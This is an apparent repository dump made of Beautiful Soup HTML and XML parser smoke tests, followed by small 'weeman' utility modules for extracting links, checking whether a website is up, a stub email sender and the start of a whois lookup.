110 |         doctype = soup.contents[0]
111 |         self.assertEqual("", doctype.strip())
112 | 
113 |     def test_public_doctype_with_url(self):
114 |         doctype = 'html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"'
115 |         self.assertDoctypeHandled(doctype)
116 | 
117 |     def test_system_doctype(self):
118 |         self.assertDoctypeHandled('foo SYSTEM "http://www.example.com/"')
119 | 
120 |     def test_namespaced_system_doctype(self):
121 |         # We can handle a namespaced doctype with a system ID.
122 |         self.assertDoctypeHandled('xsl:stylesheet SYSTEM "htmlent.dtd"')
123 | 
124 |     def test_namespaced_public_doctype(self):
125 |         # Test a namespaced doctype with a public id.
126 |         self.assertDoctypeHandled('xsl:stylesheet PUBLIC "htmlent.dtd"')
127 | 
128 |     def test_real_xhtml_document(self):
129 |         """A real XHTML document should come out more or less the same as it went in."""
130 |         markup = b"""<?xml version="1.0" encoding="utf-8"?>
131 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
132 | <html xmlns="http://www.w3.org/1999/xhtml">
133 | <head><title>Hello.</title></head>
134 | <body>Goodbye.</body>
135 | </html>"""
136 |         soup = self.soup(markup)
137 |         self.assertEqual(
138 |             soup.encode("utf-8").replace(b"\n", b""),
139 |             markup.replace(b"\n", b""))
140 | 
141 |     def test_processing_instruction(self):
142 |         # We test both Unicode and bytestring to verify that
143 |         # process_markup correctly sets processing_instruction_class
144 |         # even when the markup is already Unicode and there is no
145 |         # need to process anything.
146 |         markup = u"""<?PITarget PIContent?>"""
147 |         soup = self.soup(markup)
148 |         self.assertEqual(markup, soup.decode())
149 | 
150 |         markup = b"""<?PITarget PIContent?>"""
151 |         soup = self.soup(markup)
152 |         self.assertEqual(markup, soup.encode("utf8"))
153 | 
154 |     def test_deepcopy(self):
155 |         """Make sure you can copy the tree builder.
156 | 
157 |         This is important because the builder is part of a
158 |         BeautifulSoup object, and we want to be able to copy that.
159 |         """
160 |         copy.deepcopy(self.default_builder)
161 | 
162 |     def test_p_tag_is_never_empty_element(self):
163 |         """A <p> tag is never designated as an empty-element tag.
164 | 
165 |         Even if the markup shows it as an empty-element tag, it
166 |         shouldn't be presented that way.
167 |         """
168 |         soup = self.soup("<p/>")
169 |         self.assertFalse(soup.p.is_empty_element)
170 |         self.assertEqual(str(soup.p), "<p></p>")
171 | 
172 |     def test_unclosed_tags_get_closed(self):
173 |         """A tag that's not closed by the end of the document should be closed.
174 | 
175 |         This applies to all tags except empty-element tags.
176 |         """
177 |         self.assertSoupEquals("<p>", "<p></p>")
178 |         self.assertSoupEquals("<b>", "<b></b>")
179 | 
180 |         self.assertSoupEquals("<br>", "<br/>")
181 | 
182 |     def test_br_is_always_empty_element_tag(self):
183 |         """A <br> tag is designated as an empty-element tag.
184 | 
185 |         Some parsers treat <br></br> as one <br/> tag, some parsers as
186 |         two tags, but it should always be an empty-element tag.
187 |         """
188 |         soup = self.soup("<br></br>")
189 |         self.assertTrue(soup.br.is_empty_element)
190 |         self.assertEqual(str(soup.br), "<br/>")
191 | 
192 |     def test_nested_formatting_elements(self):
193 |         self.assertSoupEquals("<em><em></em></em>")
194 | 
195 |     def test_double_head(self):
196 |         html = '''<!DOCTYPE html>
197 | <html>
198 | <head>
199 | <title>Ordinary HEAD element test</title>
200 | </head>
201 | <script type="text/javascript">
202 | alert("Help!");
203 | </script>
204 | <body>
205 | Hello, world!
206 | </body>
207 | </html>
208 | '''
209 |         soup = self.soup(html)
210 |         self.assertEqual("text/javascript", soup.find('script')['type'])
211 | 
212 |     def test_comment(self):
213 |         # Comments are represented as Comment objects.
214 |         markup = "<p>foo<!--foobar-->baz</p>"
215 |         self.assertSoupEquals(markup)
216 | 
217 |         soup = self.soup(markup)
218 |         comment = soup.find(text="foobar")
219 |         self.assertEqual(comment.__class__, Comment)
220 | 
221 |         # The comment is properly integrated into the tree.
222 |         foo = soup.find(text="foo")
223 |         self.assertEqual(comment, foo.next_element)
224 |         baz = soup.find(text="baz")
225 |         self.assertEqual(comment, baz.previous_element)
226 | 
227 |     def test_preserved_whitespace_in_pre_and_textarea(self):
228 |         """Whitespace must be preserved in <pre> and <textarea> tags,
229 |         even if that would mean not prettifying the markup.
230 |         """
231 |         pre_markup = "<pre>   </pre>"
232 |         textarea_markup = "<textarea> woo\nwoo  </textarea>"
233 |         self.assertSoupEquals(pre_markup)
234 |         self.assertSoupEquals(textarea_markup)
235 | 
236 |         soup = self.soup(pre_markup)
237 |         self.assertEqual(soup.pre.prettify(), pre_markup)
238 | 
239 |         soup = self.soup(textarea_markup)
240 |         self.assertEqual(soup.textarea.prettify(), textarea_markup)
241 | 
242 |         soup = self.soup("<textarea></textarea>")
243 |         self.assertEqual(soup.textarea.prettify(), "<textarea></textarea>")
244 | 
245 |     def test_nested_inline_elements(self):
246 |         """Inline elements can be nested indefinitely."""
247 |         b_tag = "<b>Inside a B tag</b>"
248 |         self.assertSoupEquals(b_tag)
249 | 
250 |         nested_b_tag = "<p>A <i>nested <b>tag</b></i></p>"
251 |         self.assertSoupEquals(nested_b_tag)
252 | 
253 |         double_nested_b_tag = "<p>A <a>doubly <i>nested <b>tag</b></i></a></p>"
254 |         self.assertSoupEquals(nested_b_tag)
255 | 
256 |     def test_nested_block_level_elements(self):
257 |         """Block elements can be nested."""
258 |         soup = self.soup('<blockquote><p><b>Foo</b></p></blockquote>')
259 |         blockquote = soup.blockquote
260 |         self.assertEqual(blockquote.p.b.string, 'Foo')
261 |         self.assertEqual(blockquote.b.string, 'Foo')
262 | 
263 |     def test_correctly_nested_tables(self):
264 |         """One table can go inside another one."""
265 |         markup = ('<table id="1">'
266 |                   '<tr>'
267 |                   "<td>Here's another table:"
268 |                   '<table id="2">'
269 |                   '<tr><td>foo</td></tr>'
270 |                   '</table></td>')
271 | 
272 |         self.assertSoupEquals(
273 |             markup,
274 |             '<table id="1"><tr><td>Here\'s another table:'
275 |             '<table id="2"><tr><td>foo</td></tr></table>'
276 |             '</td></tr></table>')
277 | 
278 |         self.assertSoupEquals(
279 |             "<table><thead><tr><td>Foo</td></tr></thead>"
280 |             "<tbody><tr><td>Bar</td></tr></tbody>"
281 |             "<tfoot><tr><td>Baz</td></tr></tfoot></table>")
282 | 
283 |     def test_deeply_nested_multivalued_attribute(self):
284 |         # html5lib can set the attributes of the same tag many times
285 |         # as it rearranges the tree. This has caused problems with
286 |         # multivalued attributes.
287 |         markup = '<table><div><div class="css"></div></div></table>'
288 |         soup = self.soup(markup)
289 |         self.assertEqual(["css"], soup.div.div['class'])
290 | 
291 |     def test_multivalued_attribute_on_html(self):
292 |         # html5lib uses a different API to set the attributes ot the
293 |         # <html> tag. This has caused problems with multivalued
294 |         # attributes.
295 |         markup = '<html class="a b"></html>'
296 |         soup = self.soup(markup)
297 |         self.assertEqual(["a", "b"], soup.html['class'])
298 | 
299 |     def test_angle_brackets_in_attribute_values_are_escaped(self):
300 |         self.assertSoupEquals('<a b="<a>"></a>', '<a b="&lt;a&gt;"></a>')
301 | 
302 |     def test_entities_in_attributes_converted_to_unicode(self):
303 |         expect = u'<p id="pi\N{LATIN SMALL LETTER N WITH TILDE}ata"></p>'
304 |         self.assertSoupEquals('<p id="pi&#241;ata"></p>', expect)
305 |         self.assertSoupEquals('<p id="pi&#xf1;ata"></p>', expect)
306 |         self.assertSoupEquals('<p id="pi&#Xf1;ata"></p>', expect)
307 |         self.assertSoupEquals('<p id="pi&ntilde;ata"></p>', expect)
308 | 
309 |     def test_entities_in_text_converted_to_unicode(self):
310 |         expect = u'<p>pi\N{LATIN SMALL LETTER N WITH TILDE}ata</p>'
311 |         self.assertSoupEquals("<p>pi&#241;ata</p>", expect)
312 |         self.assertSoupEquals("<p>pi&#xf1;ata</p>", expect)
313 |         self.assertSoupEquals("<p>pi&#Xf1;ata</p>", expect)
314 |         self.assertSoupEquals("<p>pi&ntilde;ata</p>", expect)
315 | 
316 |     def test_quot_entity_converted_to_quotation_mark(self):
317 |         self.assertSoupEquals("<p>I said &quot;good day!&quot;</p>",
318 |                               '<p>I said "good day!"</p>')
319 | 
320 |     def test_out_of_range_entity(self):
321 |         expect = u"\N{REPLACEMENT CHARACTER}"
322 |         self.assertSoupEquals("&#10000000000000;", expect)
323 |         self.assertSoupEquals("&#x10000000000000;", expect)
324 |         self.assertSoupEquals("&#1000000000;", expect)
325 | 
326 |     def test_multipart_strings(self):
327 |         "Mostly to prevent a recurrence of a bug in the html5lib treebuilder."
328 |         soup = self.soup("<html><h2>\nfoo</h2><p></p></html>")
329 |         self.assertEqual("p", soup.h2.string.next_element.name)
330 |         self.assertEqual("p", soup.p.name)
331 |         self.assertConnectedness(soup)
332 | 
333 |     def test_head_tag_between_head_and_body(self):
334 |         "Prevent recurrence of a bug in the html5lib treebuilder."
335 |         content = """<html><head></head>
336 |   <link></link>
337 |   <body>foo</body>
338 | </html>
339 | """
340 |         soup = self.soup(content)
341 |         self.assertNotEqual(None, soup.html.body)
342 |         self.assertConnectedness(soup)
343 | 
344 |     def test_multiple_copies_of_a_tag(self):
345 |         "Prevent recurrence of a bug in the html5lib treebuilder."
346 |         content = """<!DOCTYPE html>
347 | <html>
348 |  <body>
349 |    <article id="a" >
350 |    <div><a href="1"></div>
351 |    <footer>
352 |      <a href="2"></a>
353 |    </footer>
354 |   </article>
355 |   </body>
356 | </html>
357 | """
358 |         soup = self.soup(content)
359 |         self.assertConnectedness(soup.article)
360 | 
361 |     def test_basic_namespaces(self):
362 |         """Parsers don't need to *understand* namespaces, but at the
363 |         very least they should not choke on namespaces or lose
364 |         data."""
365 | 
366 |         markup = b'<html xmlns="http://www.w3.org/1999/xhtml" xmlns:mathml="http://www.w3.org/1998/Math/MathML" xmlns:svg="http://www.w3.org/2000/svg"><head></head><body><mathml:msqrt>4</mathml:msqrt><b svg:fill="red"></b></body></html>'
367 |         soup = self.soup(markup)
368 |         self.assertEqual(markup, soup.encode())
369 |         html = soup.html
370 |         self.assertEqual('http://www.w3.org/1999/xhtml', soup.html['xmlns'])
371 |         self.assertEqual(
372 |             'http://www.w3.org/1998/Math/MathML', soup.html['xmlns:mathml'])
373 |         self.assertEqual(
374 |             'http://www.w3.org/2000/svg', soup.html['xmlns:svg'])
375 | 
376 |     def test_multivalued_attribute_value_becomes_list(self):
377 |         markup = b'<a class="foo bar">'
378 |         soup = self.soup(markup)
379 |         self.assertEqual(['foo', 'bar'], soup.a['class'])
380 | 
381 |     #
382 |     # Generally speaking, tests below this point are more tests of
383 |     # Beautiful Soup than tests of the tree builders. But parsers are
384 |     # weird, so we run these tests separately for every tree builder
385 |     # to detect any differences between them.
386 |     #
387 | 
388 |     def test_can_parse_unicode_document(self):
389 |         # A seemingly innocuous document... but it's in Unicode! And
390 |         # it contains characters that can't be represented in the
391 |         # encoding found in the  declaration! The horror!
392 |         markup = u'<html><head><meta encoding="euc-jp"></head><body>Sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!</body>'
393 |         soup = self.soup(markup)
394 |         self.assertEqual(u'Sacr\xe9 bleu!', soup.body.string)
395 | 
396 |     def test_soupstrainer(self):
397 |         """Parsers should be able to work with SoupStrainers."""
398 |         strainer = SoupStrainer("b")
399 |         soup = self.soup("A <b>bold</b> <meta/> <i>statement</i>",
400 |                          parse_only=strainer)
401 |         self.assertEqual(soup.decode(), "<b>bold</b>")
402 | 
403 |     def test_single_quote_attribute_values_become_double_quotes(self):
404 |         self.assertSoupEquals("<foo attr='bar'></foo>",
405 |                               '<foo attr="bar"></foo>')
406 | 
407 |     def test_attribute_values_with_nested_quotes_are_left_alone(self):
408 |         text = """<foo attr='bar "brawls" happen'>a</foo>"""
409 |         self.assertSoupEquals(text)
410 | 
411 |     def test_attribute_values_with_double_nested_quotes_get_quoted(self):
412 |         text = """<foo attr='bar "brawls" happen'>a</foo>"""
413 |         soup = self.soup(text)
414 |         soup.foo['attr'] = 'Brawls happen at "Bob\'s Bar"'
415 |         self.assertSoupEquals(
416 |             soup.foo.decode(),
417 |             """<foo attr="Brawls happen at &quot;Bob\'s Bar&quot;">a</foo>""")
418 | 
419 |     def test_ampersand_in_attribute_value_gets_escaped(self):
420 |         self.assertSoupEquals('<this is="really messed up & stuff"></this>',
421 |                               '<this is="really messed up &amp; stuff"></this>')
422 | 
423 |         self.assertSoupEquals(
424 |             '<a href="http://example.org?a=1&b=2;3">foo</a>',
425 |             '<a href="http://example.org?a=1&amp;b=2;3">foo</a>')
426 | 
427 |     def test_escaped_ampersand_in_attribute_value_is_left_alone(self):
428 |         self.assertSoupEquals('<a href="http://example.org?a=1&amp;b=2;3"></a>')
429 | 
430 |     def test_entities_in_strings_converted_during_parsing(self):
431 |         # Both XML and HTML entities are converted to Unicode characters
432 |         # during parsing.
433 |         text = "<p>&lt;&lt;sacr&eacute;&#32;bleu!&gt;&gt;</p>"
434 |         expected = u"<p>&lt;&lt;sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!&gt;&gt;</p>"
435 |         self.assertSoupEquals(text, expected)
436 | 
437 |     def test_smart_quotes_converted_on_the_way_in(self):
438 |         # Microsoft smart quotes are converted to Unicode characters during
439 |         # parsing.
440 |         quote = b"<p>\x91Foo\x92</p>"
441 |         soup = self.soup(quote)
442 |         self.assertEqual(
443 |             soup.p.string,
444 |             u"\N{LEFT SINGLE QUOTATION MARK}Foo\N{RIGHT SINGLE QUOTATION MARK}")
445 | 
446 |     def test_non_breaking_spaces_converted_on_the_way_in(self):
447 |         soup = self.soup("<a>&nbsp;&nbsp;</a>")
448 |         self.assertEqual(soup.a.string, u"\N{NO-BREAK SPACE}" * 2)
449 | 
450 |     def test_entities_converted_on_the_way_out(self):
451 |         text = "<p>&lt;&lt;sacr&eacute;&#32;bleu!&gt;&gt;</p>"
452 |         expected = u"<p>&lt;&lt;sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!&gt;&gt;</p>".encode("utf-8")
453 |         soup = self.soup(text)
454 |         self.assertEqual(soup.p.encode("utf-8"), expected)
455 | 
456 |     def test_real_iso_latin_document(self):
457 |         # Smoke test of interrelated functionality, using an
458 |         # easy-to-understand document.
459 | 
460 |         # Here it is in Unicode. Note that it claims to be in ISO-Latin-1.
461 |         unicode_html = u'<html><head><meta content="text/html; charset=ISO-Latin-1" http-equiv="Content-type"/></head><body><p>Sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!</p></body></html>'
462 | 
463 |         # That's because we're going to encode it into ISO-Latin-1, and use
464 |         # that to test.
465 |         iso_latin_html = unicode_html.encode("iso-8859-1")
466 | 
467 |         # Parse the ISO-Latin-1 HTML.
468 |         soup = self.soup(iso_latin_html)
469 |         # Encode it to UTF-8.
470 |         result = soup.encode("utf-8")
471 | 
472 |         # What do we expect the result to look like? Well, it would
473 |         # look like unicode_html, except that the META tag would say
474 |         # UTF-8 instead of ISO-Latin-1.
475 |         expected = unicode_html.replace("ISO-Latin-1", "utf-8")
476 | 
477 |         # And, of course, it would be in UTF-8, not Unicode.
478 |         expected = expected.encode("utf-8")
479 | 
480 |         # Ta-da!
481 |         self.assertEqual(result, expected)
482 | 
483 |     def test_real_shift_jis_document(self):
484 |         # Smoke test to make sure the parser can handle a document in
485 |         # Shift-JIS encoding, without choking.
486 |         shift_jis_html = (
487 |             b'<html><head></head><body><pre>'
488 |             b'\x82\xb1\x82\xea\x82\xcdShift-JIS\x82\xc5\x83R\x81[\x83f'
489 |             b'\x83B\x83\x93\x83O\x82\xb3\x82\xea\x82\xbd\x93\xfa\x96{\x8c'
490 |             b'\xea\x82\xcc\x83t\x83@\x83C\x83\x8b\x82\xc5\x82\xb7\x81B'
491 |             b'</pre></body></html>')
492 |         unicode_html = shift_jis_html.decode("shift-jis")
493 |         soup = self.soup(unicode_html)
494 | 
495 |         # Make sure the parse tree is correctly encoded to various
496 |         # encodings.
497 |         self.assertEqual(soup.encode("utf-8"), unicode_html.encode("utf-8"))
498 |         self.assertEqual(soup.encode("euc_jp"), unicode_html.encode("euc_jp"))
499 | 
500 |     def test_real_hebrew_document(self):
501 |         # A real-world test to make sure we can convert ISO-8859-9 (a
502 |         # Hebrew encoding) to UTF-8.
503 |         hebrew_document = b'<html><head><title>Hebrew (ISO 8859-8) in Visual Directionality</title></head><body><h1>Hebrew (ISO 8859-8) in Visual Directionality</h1>\xed\xe5\xec\xf9</body></html>'
504 |         soup = self.soup(
505 |             hebrew_document, from_encoding="iso8859-8")
506 |         # Some tree builders call it iso8859-8, others call it iso-8859-9.
507 |         # That's not a difference we really care about.
508 |         assert soup.original_encoding in ('iso8859-8', 'iso-8859-8')
509 |         self.assertEqual(
510 |             soup.encode('utf-8'),
511 |             hebrew_document.decode("iso8859-8").encode("utf-8"))
512 | 
513 |     def test_meta_tag_reflects_current_encoding(self):
514 |         # Here's the <meta> tag saying that a document is
515 |         # encoded in Shift-JIS.
516 |         meta_tag = ('<meta content="text/html; charset=x-sjis" '
517 |                     'http-equiv="Content-type"/>')
518 | 
519 |         # Here's a document incorporating that meta tag.
520 |         shift_jis_html = (
521 |             '<html><head>\n%s\n'
522 |             '<meta http-equiv="Content-language" content="ja"/>'
523 |             '</head><body>Shift-JIS markup goes here.') % meta_tag
524 |         soup = self.soup(shift_jis_html)
525 | 
526 |         # Parse the document, and the charset is seemingly unaffected.
527 |         parsed_meta = soup.find('meta', {'http-equiv': 'Content-type'})
528 |         content = parsed_meta['content']
529 |         self.assertEqual('text/html; charset=x-sjis', content)
530 | 
531 |         # But that value is actually a ContentMetaAttributeValue object.
532 |         self.assertTrue(isinstance(content, ContentMetaAttributeValue))
533 | 
534 |         # And it will take on a value that reflects its current
535 |         # encoding.
536 |         self.assertEqual('text/html; charset=utf8', content.encode("utf8"))
537 | 
538 |         # For the rest of the story, see TestSubstitutions in
539 |         # test_tree.py.
540 | 
541 |     def test_html5_style_meta_tag_reflects_current_encoding(self):
542 |         # Here's the <meta> tag saying that a document is
543 |         # encoded in Shift-JIS.
544 |         meta_tag = ('<meta id="encoding" charset="x-sjis" />')
545 | 
546 |         # Here's a document incorporating that meta tag.
547 |         shift_jis_html = (
548 |             '<html><head>\n%s\n'
549 |             '<meta http-equiv="Content-language" content="ja"/>'
550 |             '</head><body>Shift-JIS markup goes here.') % meta_tag
551 |         soup = self.soup(shift_jis_html)
552 | 
553 |         # Parse the document, and the charset is seemingly unaffected.
554 |         parsed_meta = soup.find('meta', id="encoding")
555 |         charset = parsed_meta['charset']
556 |         self.assertEqual('x-sjis', charset)
557 | 
558 |         # But that value is actually a CharsetMetaAttributeValue object.
559 |         self.assertTrue(isinstance(charset, CharsetMetaAttributeValue))
560 | 
561 |         # And it will take on a value that reflects its current
562 |         # encoding.
563 |         self.assertEqual('utf8', charset.encode("utf8"))
564 | 
565 |     def test_tag_with_no_attributes_can_have_attributes_added(self):
566 |         data = self.soup("<a>text</a>")
567 |         data.a['foo'] = 'bar'
568 |         self.assertEqual('<a foo="bar">text</a>', data.a.decode())
569 | 
570 | class XMLTreeBuilderSmokeTest(object):
571 | 
572 |     def test_pickle_and_unpickle_identity(self):
573 |         # Pickling a tree, then unpickling it, yields a tree identical
574 |         # to the original.
575 |         tree = self.soup("<a><b>foo</a>")
576 |         dumped = pickle.dumps(tree, 2)
577 |         loaded = pickle.loads(dumped)
578 |         self.assertEqual(loaded.__class__, BeautifulSoup)
579 |         self.assertEqual(loaded.decode(), tree.decode())
580 | 
581 |     def test_docstring_generated(self):
582 |         soup = self.soup("<root/>")
583 |         self.assertEqual(
584 |             soup.encode(), b'<?xml version="1.0" encoding="utf-8"?>\n<root/>')
585 | 
586 |     def test_xml_declaration(self):
587 |         markup = b"""<?xml version="1.0" encoding="utf8"?>\n<foo/>"""
588 |         soup = self.soup(markup)
589 |         self.assertEqual(markup, soup.encode("utf8"))
590 | 
591 |     def test_processing_instruction(self):
592 |         markup = b"""<?xml version="1.0" encoding="utf8"?>\n<?PITarget PIContent?>"""
593 |         soup = self.soup(markup)
594 |         self.assertEqual(markup, soup.encode("utf8"))
595 | 
596 |     def test_real_xhtml_document(self):
597 |         """A real XHTML document should come out *exactly* the same as it went in."""
598 |         markup = b"""<?xml version="1.0" encoding="utf-8"?>
599 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
600 | <html xmlns="http://www.w3.org/1999/xhtml">
601 | <head><title>Hello.</title></head>
602 | <body>Goodbye.</body>
603 | </html>"""
604 |         soup = self.soup(markup)
605 |         self.assertEqual(
606 |             soup.encode("utf-8"), markup)
607 | 
608 |     def test_formatter_processes_script_tag_for_xml_documents(self):
609 |         doc = """
610 |   <script type="text/javascript">
611 |   </script>
612 | """
613 |         soup = BeautifulSoup(doc, "lxml-xml")
614 |         # lxml would have stripped this while parsing, but we can add
615 |         # it later.
616 |         soup.script.string = 'console.log("< < hey > > ");'
617 |         encoded = soup.encode()
618 |         self.assertTrue(b"&lt; &lt; hey &gt; &gt;" in encoded)
619 | 
620 |     def test_can_parse_unicode_document(self):
621 |         markup = u'<?xml version="1.0" encoding="euc-jp"><root>Sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!</root>'
622 |         soup = self.soup(markup)
623 |         self.assertEqual(u'Sacr\xe9 bleu!', soup.root.string)
624 | 
625 |     def test_popping_namespaced_tag(self):
626 |         markup = '<rss xmlns:dc="foo"><dc:creator>b</dc:creator><dc:date>2012-07-02T20:33:42Z</dc:date><dc:rights>c</dc:rights><image>d</image></rss>'
627 |         soup = self.soup(markup)
628 |         self.assertEqual(
629 |             unicode(soup.rss), markup)
630 | 
631 |     def test_docstring_includes_correct_encoding(self):
632 |         soup = self.soup("<root/>")
633 |         self.assertEqual(
634 |             soup.encode("latin1"),
635 |             b'<?xml version="1.0" encoding="latin1"?>\n<root/>')
636 | 
637 |     def test_large_xml_document(self):
638 |         """A large XML document should come out the same as it went in."""
639 |         markup = (b'<?xml version="1.0" encoding="utf-8"?>\n<root>'
640 |                   + b'0' * (2**12)
641 |                   + b'</root>')
642 |         soup = self.soup(markup)
643 |         self.assertEqual(soup.encode("utf-8"), markup)
644 | 
645 | 
646 |     def test_tags_are_empty_element_if_and_only_if_they_are_empty(self):
647 |         self.assertSoupEquals("<p>", "<p/>")
648 |         self.assertSoupEquals("<p>foo</p>")
649 | 
650 |     def test_namespaces_are_preserved(self):
651 |         markup = '<root xmlns:a="http://example.com/" xmlns:b="http://example.net/"><a:foo>This tag is in the a namespace</a:foo><b:foo>This tag is in the b namespace</b:foo></root>'
652 |         soup = self.soup(markup)
653 |         root = soup.root
654 |         self.assertEqual("http://example.com/", root['xmlns:a'])
655 |         self.assertEqual("http://example.net/", root['xmlns:b'])
656 | 
657 |     def test_closing_namespaced_tag(self):
658 |         markup = '<p xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:date>20010504</dc:date></p>'
659 |         soup = self.soup(markup)
660 |         self.assertEqual(unicode(soup.p), markup)
661 | 
662 |     def test_namespaced_attributes(self):
663 |         markup = '<foo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><bar xsi:schemaLocation="http://www.example.com"/></foo>'
664 |         soup = self.soup(markup)
665 |         self.assertEqual(unicode(soup.foo), markup)
666 | 
667 |     def test_namespaced_attributes_xml_namespace(self):
668 |         markup = '<foo xml:lang="fr">bar</foo>'
669 |         soup = self.soup(markup)
670 |         self.assertEqual(unicode(soup.foo), markup)
671 | 
672 | class HTML5TreeBuilderSmokeTest(HTMLTreeBuilderSmokeTest):
673 |     """Smoke test for a tree builder that supports HTML5."""
674 | 
675 |     def test_real_xhtml_document(self):
676 |         # Since XHTML is not HTML5, HTML5 parsers are not tested to handle
677 |         # XHTML documents in any particular way.
678 |         pass
679 | 
680 |     def test_html_tags_have_namespace(self):
681 |         markup = "<a>"
682 |         soup = self.soup(markup)
683 |         self.assertEqual("http://www.w3.org/1999/xhtml", soup.a.namespace)
684 | 
685 |     def test_svg_tags_have_namespace(self):
686 |         markup = '<svg><circle/></svg>'
687 |         soup = self.soup(markup)
688 |         namespace = "http://www.w3.org/2000/svg"
689 |         self.assertEqual(namespace, soup.svg.namespace)
690 |         self.assertEqual(namespace, soup.circle.namespace)
691 | 
692 | 
693 |     def test_mathml_tags_have_namespace(self):
694 |         markup = '<math><msqrt>5</msqrt></math>'
695 |         soup = self.soup(markup)
696 |         namespace = 'http://www.w3.org/1998/Math/MathML'
697 |         self.assertEqual(namespace, soup.math.namespace)
698 |         self.assertEqual(namespace, soup.msqrt.namespace)
699 | 
700 |     def test_xml_declaration_becomes_comment(self):
701 |         markup = '<?xml version="1.0" encoding="utf-8"?><html></html>'
702 |         soup = self.soup(markup)
703 |         self.assertTrue(isinstance(soup.contents[0], Comment))
704 |         self.assertEqual(soup.contents[0], '?xml version="1.0" encoding="utf-8"?')
705 |         self.assertEqual("html", soup.contents[0].next_element.name)
706 | 
707 | def skipIf(condition, reason):
708 |    def nothing(test, *args, **kwargs):
709 |        return None
710 | 
711 |    def decorator(test_item):
712 |        if condition:
713 |            return nothing
714 |        else:
715 |            return test_item
716 | 
717 |    return decorator
718 | 


--------------------------------------------------------------------------------
/weeman/modules/0.txt:
--------------------------------------------------------------------------------
1 | https://github.com/GottModusTermux/
2 | 


--------------------------------------------------------------------------------
/weeman/modules/email.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # email.py - weeman module - send email with HTML content.
 3 | #
 4 | # Copyright (c) 2016 Hypsurus <hypsurus@mail.ru>
 5 | #
 6 | # See 'LICENSE' for module copying
 7 | #
 8 | 
 9 | import smtplib
10 | 
11 | # Module global configs
12 | MODULE_AUTHOR = "Hypsurus <hypsurus@mail.ru>"
13 | MODULE_LICENSE = "GPLv3"
14 | MODULE_VERSION = "0.1"
15 | MODULE_DATE = "22-01-2016"
16 | # Keep it short
17 | MODULE_DE   = "Send an email with HTML content."
18 | 
19 | class Email(object):
20 |     """ Send HTML email """
21 |     def __init__(self):
22 |         pass
23 | 
24 | def main():
25 |     pass
26 | 


--------------------------------------------------------------------------------
/weeman/modules/extract_links.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # extract_links.py - weeman module - extract links from HTML page
 3 | #
 4 | # Copyright (c) 2015 Hypsurus <hypsurus@mail.ru>
 5 | #
 6 | # See 'LICENSE' for module copying
 7 | #
 8 | 
 9 | import urllib2
10 | import re
11 | from core.misc import printt 
12 | 
13 | # Module global configs
14 | MODULE_AUTHOR = "Hypsurus <hypsurus@mail.ru>"
15 | MODULE_LICENSE = "GPLv3"
16 | MODULE_VERSION = "0.1"
17 | MODULE_DATE = "18-12-2015"
18 | # Keep it short
19 | MODULE_DE   = "Extract links from HTML page."
20 | 
21 | class Extract(object):
22 |     """ Get links from HTML page """
23 |     def __init__(self, ufile):
24 |         self.ufile = ufile
25 |         self.links = []
26 |     
27 |     def request(self):
28 |         """ Send HTTP request to the target """
29 |         opener = urllib2.build_opener()
30 |         opener.addheaders = [('User-Agent', 'Mozilla 5.0 (Linux)')]
31 |         return opener.open(self.ufile).read()
32 | 
33 |     def extract(self, offline=0):
34 |         """ Extract the links """
35 |         if not offline:
36 |             data = self.request()
37 |         else:
38 |             data = open(self.ufile, "r").read()
39 |         
40 |         self.links = re.findall(r'href=[\'"]?([^\'" >]+)', data)
41 | 
42 |     def show_links(self):
43 |         """ Show the links """
44 |         if not self.links:
45 |             printt(3, "No links found.")
46 |         else:
47 |             for link in self.links:
48 |                 print("[*] %s" % ( link )) 
49 | 
50 | def main(args):
51 |     try:
52 |         ufile = args[2]
53 |     except IndexError:
54 |         print("Usage: extract_links [URL/FILE].")
55 |         return # Exit main()
56 | 
57 |     run = Extract(ufile)
58 |     if "://" in ufile:
59 |         run.extract(0)
60 |     else:
61 |         run.extract(1)
62 |     run.show_links()
63 | 


--------------------------------------------------------------------------------
/weeman/modules/is_website_up.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # is_website_up.py - weeman module - checks is website is online using extrnal source
 3 | #
 4 | # Copyright (c) 2015 Hypsurus <hypsurus@mail.ru>
 5 | #
 6 | # See 'LICENSE' for module copying
 7 | #
 8 | 
 9 | import urllib2
10 | from core.misc import printt 
11 | 
12 | # Module global configs
13 | MODULE_AUTHOR = "Hypsurus <hypsurus@mail.ru>"
14 | MODULE_LICENSE = "GPLv3"
15 | MODULE_VERSION = "0.1"
16 | MODULE_DATE = "22-11-2015"
17 | # Keep it short
18 | MODULE_DE   = "checks is website up using hackertarget.com API."
19 | 
20 | class is_website_up(object):
21 |     """ Checks is website is up and running """
22 |     def __init__(self, website):
23 |         self.website = website
24 | 
25 |     def test_connection(self):
26 |         opener = urllib2.build_opener()
27 |         opener.addheaders = [('User-Agent', 
28 |             "Mozilla/5.0 (iPhone; CPU iPhone OS 9_0 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13A342 Safari/601.1")]
29 |         data = opener.open("http://api.hackertarget.com/nping/?q=%s" % (self.website)).read()
30 |         if data == "error check your api query":
31 |             printt(2, "Looks like \'%s\' is down for everyone." % (self.website))
32 |         else:
33 |             printt(3, "OK! \'%s\' is up and running!" % (self.website))
34 | 
35 | def main(args):
36 |     try:
37 |         website = args[2]
38 |     except IndexError:
39 |         print("Usage: is_website_up [URL].")
40 |         return # Exit main()
41 |     run = is_website_up(website)
42 |     run.test_connection()
43 | 
44 | 
45 | 
46 | 


--------------------------------------------------------------------------------
/weeman/modules/whois_ip.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # whois_ip.py - weeman module - WHO-IS IP
 3 | #
 4 | # Copyright (c) 2015 Hypsurus <hypsurus@mail.ru>
 5 | #
 6 | # See 'LICENSE' for module copying
 7 | #
 8 | 
 9 | 
10 | from socket import *
11 | from core.misc import printt 
